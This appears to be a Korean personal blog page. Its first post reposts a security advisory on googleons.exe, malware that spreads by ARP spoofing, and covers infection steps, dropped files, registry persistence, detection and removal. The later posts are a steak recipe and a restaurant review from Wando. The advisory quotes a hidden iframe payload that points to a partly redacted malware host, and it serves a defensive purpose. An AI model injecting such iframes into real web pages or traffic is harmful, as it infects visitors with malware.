2008.11.24 11:42

ARP Spoofing


1. 개요

(1)  최근 국내에서 ARP Spoofing을 통해 감염되고,

      감염 시 네트워크를 마비시키는 악성코드가 등장하여 주의가 필요함.
(2)  특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를

      주기적으로 탐지하고 공격 근원지를 파악하여

      관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함.

 

 

 

2. 전파방법

(1)  최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격

 -   해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로

      ARP Reply를 지속적으로 보냄.

 -   게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를

      지속적으로 보냄.

(2)  감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은

      감염된 PC를 게이트웨이로 인식하게 하여 모든 패킷을 모니터링 및 변조할 수 있음.

 -   ARP Spoofing 공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고

      아래와 같은 정보를 삽입해 악성코드 유포지 사이트로 유도.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"

(3)  악성코드 유포지 down.online[생략].net으로 유도된 PC중

      아래와 같은 윈도우 취약점 패치가 안된 사이트는 googleons.exe에 감염됨.

 -   MS05-025
 -   MS06-014
 -   MS07-017
 -   MS07-027

 

 

 

3. 악성행위 (googleons.exe)

(1)  감염 PC와 동일 네트워크 대역 ARP Spoofing 공격.

(2)  동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME " 삽입.

(3)  USB를 통한 악성코드 전파.

(4)  감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입.

      "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME "

(5)  감염시 생성되는 파일

 -    C:\Document and Settings\[계정]\Local Settings\Temp
       autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)

       googleons.exe 
       disocoo.exe (실행뒤 삭제)
       npptools.dll
       Packet.dll
       WanPacket.dll
       yahoons.exe (실행뒤 삭제)

 -    C:\windows\system32 (yahoons.exe 실행에 의해 생성되는 파일들)
       dllhost32.exe
       mh104.dll
       moyu103.dll
       mosou.exe
       mydata.exe
       nwizwmgjs.exe
       nwizwmgjs.dll
       nwizzhuxians.exe
       nwizzhuxians.dll
       RAV00xx.exe등 다수

 

(6)  부팅 후 재시작 할 수 있는 레지스트리에 등록.

 -   HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 -   이름 : svc

 -   파일 이름 : googleons.exe

 

 

 

4. 감염여부 확인 및 치료방법

(1)  감염여부 확인
 -    L3 또는 라우터에서 감염 PC 확인.

      중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인).

 

 -   ARP Spoofing 피해 PC에서 공격 PC 확인.

      전체 네트워크 Ping 스캔.

      중복 MAC 주소 IP 확인.

 

      

 

 -   악성코드 감염 및 ARP Spoofing 공격 PC 확인.

      C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe

      존재여부 확인

      googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]

 

(2)  치료방법
 -   C:\Document and Settings\[계정]\Local Settings\Temp 하위 악성코드들 삭제.

 

     

 

 -   윈도우 시스템 폴더에 존재하는 악성코드들 삭제.

 

     

 

 -   googleons.exe 프로세스 끝내기.

      [Ctrl + Alt + Del] 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료.

 

     

 

 -   레지스트리 삭제.

 ①  googleons 재시작 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 ②  기타 악성코드 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 

 

 

5. 예방 방법

(1)  감염을 위한 사전 예방 방법

 -    윈도 OS 최신 패치 실시.

 

     

 

 

 ※ 출처 : 인터넷 침해사고 대응지원센터

Trackback 0 Comment 0
2008.11.24 11:31

스테이크 만들기

 재료: 스테이크용 고기 2 장  

       ( beef steak scotch fillet @ woolworth--> 두 조각에 $9. 육즙도 풍부하고부드럽다.)

        토마토 큰 것 한개, 양파 중간 크기 한개, 양송이 버섯 큰것 5-6개

        감자 중간크기 2-3개 --> 매쉬 포테이토 용

        샐러드 용 야채 ( 취향껏), 통조림 콩 ( 이것도 개인 취향에 따라)

        갈릭 허브 솔트 --> 고기 재울때 ( 그냥 소금과 후추로 대체 가능)

        발사믹 소스 ( 발사믹 식초 다려놓은 소스), 굴 소스, tabasco 소스 ( 생략 가능), 스테이크 소스, 소금 , 후추 약간

        우유 200 cc, 물 100 cc

 

1. 고기를 찬 물에 헹궈서 키친 타올로 두드려 닦은 후 칼끝으로 여기 저기 콕콕 찍어준다

갈릭 허브 솔트를 앞 뒤로 적당히 뿌리고 올리브 오일도 뿌려서 랩을 씌운 뒤 냉장고에서 숙성 시킨다.

(난 준비 시간이 넉넉치 않아서 서너시간 정도...)

woolworth 에 샐러드 코너에 보면 세척까지 완료해서 덜어 먹기만 하면 되는 샐러드들이 종류별로 진열 되 있다.

고기는 항상 야채와 함께!!! : )

2. 양파는 채 썰고 버섯도 먹기 좋게 썰어 놓은 뒤 달군 팬에 오일을 두르고 센불에 고기를 익힌다.

육즙이 달아나는 걸 막기위해 우선 센 불에 앞 뒤를 익혀 코팅하고

한 번씩만 뒤집을 것!!!

3. 앞 뒤가 잘 익었으면 오븐에 넣어 5분 정도 익힌다.( 200도)

고기 두께에 따라 또 취향에 따라 시간 조절 가능!!! 오븐이 없으면 앞 뒤 익힌 뒤  팬에 불을 줄여서 익혀도 무관

고기를 익힐 때 팬 한 옆에서 토마토, 양파등을 같이 구워준다.

4. 고기를 익혔던 팬에 버터를 조금 두르고 양파 버섯을 노릇하게 익힌다음,

발사믹 식초 3큰술, 굴소스 1큰술, 스테이크소스 3큰술, 매콤한 맛을 원하면 타바스코 소스 1큰술을 넣고 볶다가

우유 200cc, 물 100cc넣고 졸여준다.

나중에 소금과 후추로 간을 해준다.

5. 그릇에 토마토, 매쉬포테이토, 콩 등을 담고 고기위에 소스를 뿌려주면 끝!!!

어제 허겁 지겁 먹은 스테이크!! 앞으로 종종 해먹을 듯!!! 소스가 정말 일품이다.

Trackback 0 Comment 0
2008.11.24 11:28

전복,해삼,멍게 비빔밥

아...여기는..정말루..정말루..가보구..싶당..~~

내가..좋아하는..해삼이며,멍게며,전복이며....

이거..보구..침을..넘..흘렸더니..목이..다..타넹...~~

 

 

 

완도 아시나요식당의 대박메뉴인 전복회덮밥. 전복, 해삼, 멍게 한마리씩 들어갔다. 여덟가지 채소와 완도 청정바다에서 딴 해초(톳)도 들어갔고 위에 김가루 깻가루가 뿌려진다. 1만원이란 가격이 믿기지 않는다.

 

일반인은 식당에 가서 음식을 주문하고 맛집탐방 블로거들은 초심을 주문한다. 언제나 변함없는 마음가짐 그대로 맛과 서비스에서 한결같아야 한다는 것이다. 헌데 초심! 그게 어디 말처럼 쉽간디? 블로거들이 초심을 강조하는 것만 봐도 초심을 잃은 맛집이 그만큼 많다는 방증 아니겠는가? 시간이 지날수록 적어지는 양, 떨어지는 맛, 올라가는 가격. 특히 연륜이 짧은 식당이 갑자기 방송타고 나면 부실해지는 맛과 서비스. 사정이 이러다 보니 초심을 지키며 장사 한다는 건, 기침을 참는 것처럼 쉽지 않다.

 

오늘 소문내고자 하는 이 집도 초심을 잃었다. 그런데도 손님 입장에선 대 만족을 한다. 뭔 소린고? 초심을 잃었다는데 간판을 내리기는커녕 손님들에게 더욱 사랑받고 있다고? 대체 어떤 연유인지 찾아가보자. 문제의 그 집은 완도에 있는 아시나요 식당이다. 이 집에서 개발한 전복회덮밥이 웰빙식에다 맛까지 있어 입소문을 타기 시작한건 작년 무렵. 그 전에는 주로 장어 요리로 완도 군민의 입을 사로잡고 있었다. 특히 장어주물럭이 인기다. 장어를 채소와 함께 양념으로 주물러 기름에 달궈진 돌 판에 구워 먹는 음식이다.

 

 

완도 군민에게 인기가 높은 장어주물럭(30,000원)

 

손님들에게 장어를 싼 값에 풍족하게 드리고 싶은 마음에 개발했는데 3만원 한 접시면 여럿이 먹어도 남을 만큼의 양이다. 장어를 다 구워먹은 다음 양념이 밴 돌 판에 밥을 비벼먹는 맛도 별식이다.  맛객은 작년에 이어 올해도 지난(15일) 일요일에 다시 찾았다. 그동안 이 식당에 어떤 변화가 있었을까?

 

인심 좋게 보이는 사장님이 반갑게 맞아준다. 일 년 전 그대로 여전히 주방을 책임지는 주방장이기도 하다. 장사가 어떠냐고 묻자 이제는 소문이 많이 나서 휴일이면 전국에서 전복회덮밥을 맛보러 온다고 한다. 맛객이 식사를 하고 있는 동안에도 전화는 계속 울린다. 전화로 식당 위치를 묻는 사람은 100프로 소문 듣고 외지에서 찾아오는 손님이라고 한다.

 

전복회덮밥을 받은 손님은 너무 예뻐 잠시 먹지 않고 감상하기도 한단다. 또 소문난 집에 가보면 사진으로 본 것과 차이가 있어 실망하기도 하는데 이 집의 전복회덮밥은 차이가 없어 맘에 든다고 말하는 손님도 있단다.

 

 

전복회덮밥에 들어가는 채소와 해초

 

 

신선한 채소와 해초위에 전복 해삼 멍게가 한 마리씩 올려졌다.

 

 

깻가루와 김가루를 넣고 흑깨를 뿌려 완성한다.

 

맛객도 전복회덮밥을 주문해 보았다. 가격은 1년 전 그대로 1만원. 하지만 재료와 맛은 대폭 업그레이드 되었다. 들어가는 채소의 종류가 늘었고 무엇보다 전복과 해삼을 한 마리씩 넣어준데 그치지 않고 멍게가 추가되었다. 재료의 신선도도 좋다. 수족관에 있는 전복은 칼을 이용하지 않으면 떼 내기 힘들 정도로 힘이 좋다. 해삼과 멍게 역시 맛과 향이 우수해 신선도가 좋다는 걸 증명하고 있다.

 

 

2006년도 전복회덮밥. 재료와 색상에서 지금의 전복회덮밥만 못하다.

 

예전에는 들어가지 않았던 해초까지 들어가 바다의 향기를 내뿜는다. 김가루와 깻가루까지 첨가되어 완벽하게 오방색이 갖추어졌다. 이렇게 시각적인 만족도가 높아 졌으니 먹지 않고 감상하는 손님이 생겨날 수밖에 없는 일. 맛도 더욱 좋아졌다. 오돌돌 씹히는 전복과 아삭거리는 채소의 조화. 해삼과 멍게가 주는 향미, 맛의 향연이란 이런 경우가 아닐까?

 

 

비벼서 먹고 있는 중이다.

 

거의 모든 손님들이 짜고 먹기라도 하는 듯 남기지 않는다고 한다. 딸그락 딸그락 숟가락으로 밥알 하나까지 다 긁어먹는 소리가 들리게끔 먹는다는 말이 과장은 아니다. 마지막까지 다 비워도 이상하게 포만감이나 배는 부르지 않는다. 기분이 좋다. 상쾌하다. 해산물과 채소위주의 비빔밥이어서 그런가 보다.

 

보시는 바와 같이 작년의 전복회덮밥과 달라졌다. 재료가 좋아졌고, 많아졌다. 더 맛있어 졌다. 이집은 이렇게 초심을 잃었다. 하지만 이런 변화라면 쌍수 들어 환영한다. 

 

방송에 나가면 맛집?

 

이 집의 음식을 먹고 있자니 드는 생각. 이 정도 손맛이라면 맛집프로그램에서 가만 내버려 두지 않았을 텐데 싶다. 주위를 둘러봐도 방송 탔다는 액자 하나 걸려있지 않다. 실력이 없어서가 아니다. 방송 타겠다고 마음만 먹었다면 벽면에 여러 개의 액자가 붙었을 거라고 말한다. 실제로 무한지대Q 를 비롯한 여러 프로그램에서 귀찮을 정도로 취재를 부탁했지만 모조리 거부했다고 한다.

 

이유가 궁금하다. 간단하게 답이 온다. 현재에 만족하고 있단다. 단골손님들에게 잘해주고 싶단다. 맞는 말이다. 맞는 말이지만 욕심 앞에서 쉽게 할 수 없는 생각이다. 보시라! 방송에 소개되지 않은 식당보다 소개 된 식당이 더 많을 정도가 된 세상 아닌가? 능력도 철학도  안 되는 집들이 방송에 나가고 나서 방송에 나간 화면을 액자에 담아 상장처럼 걸어 놓는다. 자신의 손맛을 음식이 아닌 방송에 나간 액자로 평가받는 게 그렇게도 좋단 말인가?

 

아시나요식당도 언젠가는 방송에 나갈지도 모른다. 또 그러한 흔적들을 벽에 걸어 놓을지도 모른다. 하지만 맛과 서비스에서만큼은 오래도록 초심을 유지 할 것이라고 믿어본다.

 

아시나요 식당 : 061) 554-3049

메뉴 : 전복회덮밥(10,000원) 장어주물럭(30,000원)

  

 

2007.7.20 맛객(블로그= 맛있는 인생)

Trackback 0 Comment 0